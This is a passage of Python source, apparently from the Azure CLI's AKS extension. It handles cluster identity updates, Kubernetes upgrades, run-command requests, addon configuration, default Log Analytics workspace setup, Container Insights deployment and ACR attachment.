'the cluster to use {} managed identity.\n After updating, your '
'cluster\'s control plane and addon pods will switch to use managed '
'identity, but kubelet will KEEP USING SERVICE PRINCIPAL '
'until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to '
'update the cluster to use {} managed identity. \nAre you sure you want to '
'perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
# pylint: disable=line-too-long
user_assigned_identity = {
assign_identity: ManagedServiceIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
monitoring_addon_enabled = False
ingress_appgw_addon_enabled = False
virtual_node_addon_enabled = False
if instance.addon_profiles is not None:
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
virtual_node_addon_enabled = CONST_VIRTUAL_NODE_ADDON_NAME + 'Linux' in instance.addon_profiles and \
instance.addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME +
'Linux'].enabled
return _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
False,
instance.agent_pool_profiles[0].vnet_subnet_id,
_is_msi_cluster(instance),
attach_acr,
None,
no_wait)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
# if this cluster have Azure AD enabled, we should pass user token.
# so the command execution also using current user identity.
# here we aquire token for AKS managed server AppID (same id for all cloud)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.begin_run_command(
resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
import adal
try:
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
except adal.AdalError as err:
# pylint: disable=no-member
if (hasattr(err, 'error_response') and
('error_description' in err.error_response) and
('AADSTS70008:' in err.error_response['error_description'])):
raise CLIError(
"Credentials have expired due to inactivity. Please run 'az login'")
raise CLIError(err)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error(
"Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (
ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2",
"brazilsouth": "CQ",
"brazilsoutheast": "BRSE",
"norwayeast": "NOE",
"southafricanorth": "JNB",
"northcentralus": "NCUS",
"uaenorth": "DXB",
"germanywestcentral": "DEWC",
"ukwest": "WUK",
"switzerlandnorth": "CHN",
"switzerlandwest": "CHW",
"uaecentral": "AUH"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "brazilsouth",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "northcentralus",
"northeurope": "northeurope",
"southafricanorth": "southafricanorth",
"southafricawest": "southafricanorth",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "ukwest",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2",
"norwayeast": "norwayeast",
"norwaywest": "norwayeast",
"switzerlandnorth": "switzerlandnorth",
"switzerlandwest": "switzerlandwest",
"uaenorth": "uaenorth",
"germanywestcentral": "germanywestcentral",
"germanynorth": "germanywestcentral",
"uaecentral": "uaecentral",
"eastus2euap": "eastus2euap",
"brazilsoutheast": "brazilsoutheast"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV",
"usgovarizona": "PHX"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia",
"usgovtexas": "usgovvirginia",
"usgovarizona": "usgovarizona"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
# TODO: track2/replace create_or_update with begin_create_or_update, depends on 'azure.mgmt.resource.resources'
resource_groups.create_or_update(default_workspace_resource_group, {
'location': workspace_region})
GenericResource = cmd.get_models(
'GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={
'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cmd,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cmd, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cmd.cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cmd, client_id, registry.id, detach)
return
